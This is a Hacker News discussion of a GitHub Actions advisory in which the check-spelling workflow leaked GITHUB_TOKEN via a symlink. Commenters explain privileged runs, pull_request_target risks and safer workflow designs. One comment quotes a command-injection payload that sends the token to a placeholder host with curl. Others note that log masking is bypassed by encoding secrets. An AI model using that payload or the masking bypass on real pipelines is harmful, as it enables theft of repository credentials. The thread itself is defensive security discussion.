GitHub Actions check-spelling community workflow GITHUB_TOKEN leakage via symlink (github.com/justinsteven)
129 points by pentestercrab on Sept 9, 2021 | 35 comments



I don't know why it hasn't occurred to me as a problem before, but branches/PRs can also modify the workflow, and their build runs the new modified workflow... I must be missing something, because that seems to make it way worse, forget symlinks and project-specific vulns, just print the env? Has modifying the workflow on a 'PR branch' only worked for me because I've been the repo owner perhaps?

Edit to add: I think what I'm missing (haven't fully understood yet, just thought should share) is the importance here of the 'pull_request_target' event type used. The docs carry a warning:

> Warning: The pull_request_target event is granted a read/write repository token and can access secrets, even when it is triggered from a fork. Although the workflow runs in the context of the base of the pull request, you should make sure that you do not check out, build, or run untrusted code from the pull request with this event. Additionally, any caches share the same scope as the base branch, and to help prevent cache poisoning, you should not save the cache if there is a possibility that the cache contents were altered. For more information, see "Keeping your GitHub Actions and workflows secure: Preventing pwn requests" on the GitHub Security Lab website.

https://docs.github.com/en/actions/reference/events-that-tri...


There's an important distinction between "privileged" and "unprivileged" Workflow Runs, and the context within which a Workflow is executed.

Let's imagine there's a repository containing a Workflow (on the branch) that listens to the `push` event and then outputs the value of `secrets.API_KEY`:

* A collaborator pushes: Workflow Run is privileged -> the value of `secrets.API_KEY` is output

* A non-collaborator pushes: Workflow Run is unprivileged -> no value is output

The `pull_request_target` event type comes into play when you need a privileged Workflow Run to execute when a non-collaborator performs an action. For security, `pull_request_target` events are only triggered against a Workflow on the primary repository branch; a non-collaborator cannot sneak a `pull_request_target` into their Pull Request. Essentially, `pull_request_target` in a Workflow on your main branch is "listening" for Pull Requests.

There is no risk using `pull_request_target` if you do not execute any code from the Pull Request within a privileged Workflow. If you execute code from the Pull Request within a privileged Workflow, then you're definitely exposed to a lot of serious problems.

* An unprivileged Workflow Run should... build artifacts, execute tests, upload artifacts to the Workflow Run

* A privileged Workflow Run should... download artifacts from the unprivileged Workflow Run, publish artifacts to storage

> Has modifying the workflow on a 'PR branch' only worked for me because I've been the repo owner perhaps?

Every time you execute a Workflow as a repository owner, it is privileged and can do anything. For example, your Pull Request Workflow Run can access secrets (so you might think that _all_ Pull Requests can access secrets) but in reality, a Pull Request from a non-collaborator cannot.

Does that help clarify? The security model of GitHub Actions has changed over the last year, so it's not completely intuitive if your frame of reference is from before the changes. I highly recommend the GitHub Security blog articles, they're very illuminating.
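As a rough model of the privileged/unprivileged distinction described here, the sketch below encodes only the rules stated in this thread. The names `RunContext` and `run_context` are made up for illustration, and the model deliberately ignores repository settings, the `permissions:` key, and approval requirements, so treat it as a reading aid and not as GitHub's actual logic.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class RunContext:
    token_can_write: bool    # whether GITHUB_TOKEN has write access
    secrets_available: bool  # whether configured secrets are exposed
    workflow_source: str     # whose copy of the workflow file is executed


def run_context(event: str, from_fork: bool) -> RunContext:
    """Simplified model of the rules described in this thread (hypothetical helper)."""
    if event == "pull_request_target":
        # Always privileged, but the workflow definition comes from the base branch.
        return RunContext(True, True, "base")
    if event == "pull_request":
        # The pull request's own workflow file runs; forks get an unprivileged run.
        privileged = not from_fork
        return RunContext(privileged, privileged, "pull request")
    raise ValueError(f"event not covered by this sketch: {event}")


print(run_context("pull_request", from_fork=True))
print(run_context("pull_request_target", from_fork=True))
```

The dangerous combination is the second one: a privileged run that then checks out and executes code from the pull request.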


Travis followed this basic model years ago also, though I don't know if they were explicit about the privileged/unprivileged; it was more just no secrets added to the environment for PRs from unknown forks.


> forget symlinks and project-specific vulns, just print the env?

GitHub masks anything that is a secret (or the github token) when it shows up in the log. You'll see stars (***) instead of the actual secret.

However, this is trivially worked around: apply a Caesar cipher to it or simply add a space between each character. It would also be super simple to ship the token to a remote server with curl, as GitHub notes in its security hardening document[0]:

> they can automate the attack and perform it in fractions of a second by calling an attacker-controlled server with the token, for example:

  a"; set +e; curl http://example.lab?token=$GITHUB_TOKEN;#.
0: https://docs.github.com/en/actions/learn-github-actions/secu...


Whenever I see ** instead of a password I have a laugh because I know the secret is hunter12.


Sure, it was just a succinct way to make the point, since as you say and others are commenting on, it's trivially worked around (in any CI system) if you're trying - it's only really supposed to stop accidental leaks.


This is every CI system on the planet

  echo ${PASSWORD} > file; cat file
And your password is now in the log file unmasked.


No, it masks the output stream by searching for all secrets and censoring them.


how does it know what are secrets? what if I base64 the password before printing it?


That's what was said: it cannot detect that. If you rot13 it, you've bypassed the protection.
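To make the point concrete, here is a minimal sketch of an exact-match log masker. It is an assumption about the general technique, not GitHub's implementation (which may recognise more variants of a secret), and the token value is invented for the example.

```python
import codecs
from typing import Iterable


def mask_secrets(log_line: str, secrets: Iterable[str]) -> str:
    """Replace every exact occurrence of a known secret with '***'."""
    for secret in secrets:
        if secret:  # an empty string would match everywhere
            log_line = log_line.replace(secret, "***")
    return log_line


# Hypothetical token value, used only for this illustration.
TOKEN = "ghs_exampleToken123"
SECRETS = [TOKEN]

plain = mask_secrets("token=" + TOKEN, SECRETS)
spaced = mask_secrets("token=" + " ".join(TOKEN), SECRETS)
rot13 = mask_secrets("token=" + codecs.encode(TOKEN, "rot13"), SECRETS)

print(plain)   # the exact value is censored
print(spaced)  # not censored; remove the spaces to recover the token
print(rot13)   # not censored; apply rot13 again to recover the token
```

Any transformation the masker does not know about defeats it, which is why masking only protects against accidental leaks.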


If the PR is from a fork, then a repository maintainer needs to approve it. By default this applies to first-time contributors, but it is configurable: https://docs.github.com/en/actions/managing-workflow-runs/ap...

NB: I've never played with configuring it.


Ah yes, new in April: https://github.blog/2021-04-22-github-actions-update-helping...

I can't find anything on configuring it though, that only mentions for first-time contributors as you say. I have a 'contributor' badge for pretty minor contributions to all sorts of projects, doesn't necessarily mean they should trust me any more than a first-time contributor! (I can be trusted! I just don't think my contribution to some of them is too much of a barrier for a malicious actor...)


https://docs.github.com/en/github/administering-a-repository... contains details for configuring it on a repository basis. Looks like you can require it for new github accounts XOR first time contributors XOR all forks.

It's also configurable at the organisation and enterprise level, if those are relevant to anyone.

Organization settings: https://docs.github.com/en/organizations/managing-organizati... Enterprise settings: https://docs.github.com/en/github/setting-up-and-managing-yo...


The more I've used Actions, the more I have come to two conclusions:

1) It's generally better to just do things with legacy tooling and your own scripts, than it is to pull in community actions

2) GitHub badly needs to implement tightly scoped tokens. GITHUB_TOKEN has a completely fixed and unmodifiable scope, and if you need to give a workflow an OAuth token to perform some other operation, your only choice is to give it a full read-write token for all of the repositories the token's user can access. You can't even scope a token to a single repo, let alone make one that's read-only, or limited to, say, commenting.



GP, and I agree, wants tokens to be scoped to repos, not to activities.

Your link describes how you can limit the things you can do with a token. But GitHub doesn’t allow limiting where you can do those things.

It’s annoying and I wish they would fix this. If you work on lots of repos across lots of orgs, this is a big vulnerability. I get the heebie-jeebies whenever I have to grant permission on something because if I make a mistake it could hose lots of things.


I was under the impression that the default temporary GITHUB_TOKEN for forked repos (which is what happens with PRs) is read-only. Isn't that the case?

https://docs.github.com/en/actions/reference/authentication-...


It is. As far as I'm aware issues like these are only problematic if you either manually run a workflow (it uses your credentials) or have a workflow with the "pull_request_target" trigger (uses a token with write access). The latter has a plethora of potential pitfalls and should be avoided if you can.


Indeed, pull_request_target should be avoided.

The better model to use here is "pull_request" to do the work of building/testing a PR, and then a separate workflow that triggers on "workflow_run" to collect the results and attach them to the PR.

It's really not a lot of fun to implement though :/
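One part of this model that is easy to get wrong: whatever the unprivileged "pull_request" run hands over is still attacker-controlled data. As a hedged sketch, suppose the first workflow stores the PR number in an artifact file (an assumption for this example, as is the helper name `parse_pr_number`). The privileged "workflow_run" side should then validate it strictly before using it anywhere:

```python
import re


def parse_pr_number(raw: str) -> int:
    """Accept only a plain positive integer; reject anything else."""
    text = raw.strip()
    if not re.fullmatch(r"[1-9][0-9]{0,9}", text):
        raise ValueError("artifact does not contain a valid PR number")
    return int(text)


print(parse_pr_number("42\n"))

try:
    parse_pr_number("42; curl http://example.lab")
except ValueError as err:
    print("rejected:", err)
```

The same attitude applies to test results or any other file pulled from the unprivileged run: parse it as data, never execute or interpolate it into a shell command.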


GitHub badly needs to add an abstraction for passing an artifact between workflows. The official recommendation for how to use workflow_run is comically messy (20+ lines of javascript-in-yaml because actions/download-artifact doesn't support fetching artifacts across repos):

https://securitylab.github.com/research/github-actions-preve...

Kinda hard to expect average users to grok this; running a follow-up workflow in a secure context with some carried-over artifacts should be trivial to do declaratively.


I wonder if GH could/should make it a lot more convenient to implement with some additional abstractions, to encourage the secure approach by making it as easy as the insecure one.


This is super interesting; we had a fairly long discussion about whether or not to add this action to cert-manager[1], and ended up rejecting it in part because it increased the risk of supply-chain attacks and that risk wasn't, in our opinion, outweighed by the potential benefit of catching more spelling mistakes.[2]

For me, I think there's a wider point here that GitHub Actions are pretty scary in terms of these kinds of attacks. Pre-packaged actions are easy to add to a project but come with risks, as this security advisory shows! There are a few aspects to Actions which made me a little uneasy in terms of my threat models when building software, and personally I've tended to avoid them.

[1] https://github.com/jetstack/cert-manager (Full disclosure, I'm part of the team paid by Jetstack to work on the cert-manager project)

[2] https://github.com/jetstack/cert-manager/pull/3863#issuecomm...


It feels kind of absurd to me that symlinks like this work by default in workflows, if at all. The symlink being able to point outside of the source tree is even worse. Github should be scrubbing anything like this from PRs at a minimum. The only use cases for this stuff I can think of are either absurdly low-quality code (a security risk you absolutely don't want to accept), or attacks.


I've always been a bit wary of running stuff automatically on PRs from untrusted persons. How easy is it to exploit? If my repo always runs all tests on a PR, could someone just add a PR with a new test that is then run? Thus running their arbitrary code.


You are wise to be wary.

There are some pretty subtle tigers waiting to maul you if you run workflows against untrusted PRs.

The way I currently do this is that our workflows run the CI build/test job in the repo of the user proposing the PR and upload the logs/results as an "Artifact". Our repo waits for that job to complete and then downloads the artifacts and produces a pretty comment with the junit test results on the PR.

However, despite recommending a model like this, GitHub still makes it infuriatingly hard to actually do, and we ended up with all of this crud to be able to get one XML file: https://github.com/Hammerspoon/hammerspoon/blob/master/.gith...


> If my repo always runs all tests on a PR, could someone just add a PR with a new test that is then run? Thus running their arbitrary code.

Running arbitrary code is inevitable if an action is configured to run on all PRs. People have abused this to run crypto miners and stuff in the past, but this for the most part is merely an annoyance to maintainers, not a security problem. It does become a security problem when arbitrary code execution is allowed with your secrets, including your configured secrets and the read/write GITHUB_TOKEN.

Expanding on the topic of secrets, if you trigger your test from the usual pull_request event, a PR from a fork gets only a read-only GITHUB_TOKEN and no configured secrets, so it's the safe default you should almost always choose. That becomes a problem when you need write access to the repo, e.g. to assign labels or add comments to the PR from the workflow, in which case you have to use the privileged pull_request_target event to expose a read/write GITHUB_TOKEN and secrets. pull_request_target by default runs in the context of the base of the PR, so there's still no arbitrary code, but you can explicitly check out the PR in that context, and when you do, your secrets are potentially exposed to arbitrary code. If you execute that arbitrary code in any job, or like in this case, post the content of effectively any file on disk as directed by an attacker, boom, owned.

Therefore, you should

- Avoid pull_request_target unless write access to the repo and/or access to configured secrets is absolutely necessary;

- When using pull_request_target, avoid checking out untrusted code;

- If it's absolutely necessary to check out untrusted code, make absolutely sure that the untrusted code isn't executed in any way, and that your trusted handling code can't be tricked by untrusted content in any way, like an arbitrary symlink. This is of course difficult to verify.

In this specific case, the fix seems to be checking that the absolute path of the untrusted advice.txt is within GITHUB_WORKSPACE (https://github.com/check-spelling/check-spelling/commit/4363...). IMO that's a wrong fix only covering up the symptom. The real cause is using untrusted configuration files at all; why not make a copy of the trusted version of configuration files and use those instead???
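For readers wondering what such a containment check looks like, here is a minimal sketch. It is not check-spelling's actual code; the helper name `is_inside` and the file names are invented, temporary directories stand in for GITHUB_WORKSPACE and for a sensitive location outside it, and a POSIX runner is assumed.

```python
import os
import tempfile


def is_inside(base_dir: str, candidate: str) -> bool:
    """Return True if candidate, after resolving symlinks, lies within base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(candidate)
    # commonpath compares whole path components, so /tmp/ws2 is not "inside" /tmp/ws.
    return os.path.commonpath([base, target]) == base


with tempfile.TemporaryDirectory() as workspace, tempfile.TemporaryDirectory() as outside:
    secret_file = os.path.join(outside, "config")
    with open(secret_file, "w") as fh:
        fh.write("token")

    honest = os.path.join(workspace, "advice.txt")
    with open(honest, "w") as fh:
        fh.write("Please fix the spelling.")

    malicious = os.path.join(workspace, "evil-advice.txt")
    os.symlink(secret_file, malicious)  # symlink escaping the workspace

    honest_ok = is_inside(workspace, honest)
    malicious_ok = is_inside(workspace, malicious)

print(honest_ok, malicious_ok)
```

A check like this only stops paths that resolve outside the workspace. It does nothing about sensitive files inside the workspace, which is one more argument for reading configuration from a trusted copy instead.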

GitHub has an article about security considerations here: https://securitylab.github.com/research/github-actions-preve...


Do spelling checks like this one provide valuable feedback for anyone?

I always found they required constant configuration to handle regional language and false positives on valid programming terms.


In my experience, not really. It reminds me of another build-time check that I've seen which crawls material looking for broken (non-200) links.

Unfortunately, if you link to a single site too often, it'll hit rate limits and start to think links are broken, breaking the entire build process over a non-issue.

It runs slightly contrary to another value I hold that is "anything that can be enforced by a machine should be enforced by a machine", but when it starts to introduce security or other issues that impact velocity, it stops being a good check.


> Importantly, you must do this for every open branch in your repo. It is not enough to do so for only your default branch since a malicious PR can target any of your open branches. That is, if you have an open branch that uses a vulnerable version of check-spelling then a malicious PR targeting that branch can leak a GITHUB_TOKEN which can then be used to impact any of your branches, including your default branch.

I think this is a big design flaw in GitHub Actions. Whenever there is a security patch, you have to make sure to apply it in every branch. This includes all the historical branches and stale branches which the repo owners forget to delete.


Hard to follow this because I'm mostly on the consuming end of CIs or occasionally do some basic things. Although I've recently tried GHA, setting it up from scratch even for complex setups seems almost trivial. But the security of GHA seems more than shaky.

> I think this is a big design flaw in GitHub Actions. Whenever there is a security patch, you have to make sure to apply them in every branch.

On the other hand I think every action needs to be initialized once on the main branch.


If it’s pulling the actions from git using a fixed commit, then a workaround could be to break history from before the vuln was introduced; then it wouldn’t be possible to pull the vulnerable actions. GitHub does GC the unreachable commits quite aggressively.
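Whether a step pulls an action "using a fixed commit" can be checked mechanically from the value after `uses:`. The sketch below is an illustration only: the helper name `is_pinned_to_commit` is made up, the action names in the demo are placeholders, and it treats anything other than a full 40-character hex ref as not pinned.

```python
import re

# "owner/repo[/path]@ref" as it appears after "uses:" in a workflow step.
USES_PATTERN = re.compile(r"^(?P<action>[^@\s]+)@(?P<ref>\S+)$")
FULL_SHA = re.compile(r"[0-9a-f]{40}")


def is_pinned_to_commit(uses: str) -> bool:
    """True only when the ref is a full commit SHA; tags and branches can move."""
    match = USES_PATTERN.match(uses.strip())
    return bool(match and FULL_SHA.fullmatch(match.group("ref")))


print(is_pinned_to_commit("example-org/example-action@v1"))
print(is_pinned_to_commit("example-org/example-action@" + "a" * 40))
```

A pin protects consumers from a tag being moved to malicious code, but as the comments above point out, it also means a security fix upstream does not reach you until you update the pin on every branch.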


Note -- if you're running Github Actions on your local machine, run it in a VM. You can use something like multipass[0] which is pretty light (Ubuntu is heavy of course, but is the expected OS of most setup documentation).

While working on a project of mine that runs runners (Github, GitLab and others), how to safely run other people's random workloads and not become a botnet/crypto miner was basically the only hard technical challenge. GitLab is farther ahead in terms of runner sophistication (and also options available to you when self hosting) by a long shot.

[0]: https://multipass.run/docs


So, I get really confused by Github permissions model; I know that sometimes I am forced to give something access to all of my repos when I really only want it to act on one.

Does this affect the leaked GITHUB_TOKEN? What would that token give a possessor access to, and what's the scope? Just one repo, or many?

If the token gives access to, say, every repo that the user who authorized it has access to, this makes the scope of any vulnerability even worse. And vulnerabilities, like bugs, will always happen.

I've been wondering for a while how GitHub gets away with such poor scoping of its auth without more outcry/demand. And figured that maybe it would take an exercised vulnerability to bring attention to it.


GITHUB_TOKEN is scoped to a single repo.


Probably this info is reflected somewhere in the document (my bad), but is there any specific insight that we can learn for the code we write to avoid similar issues?



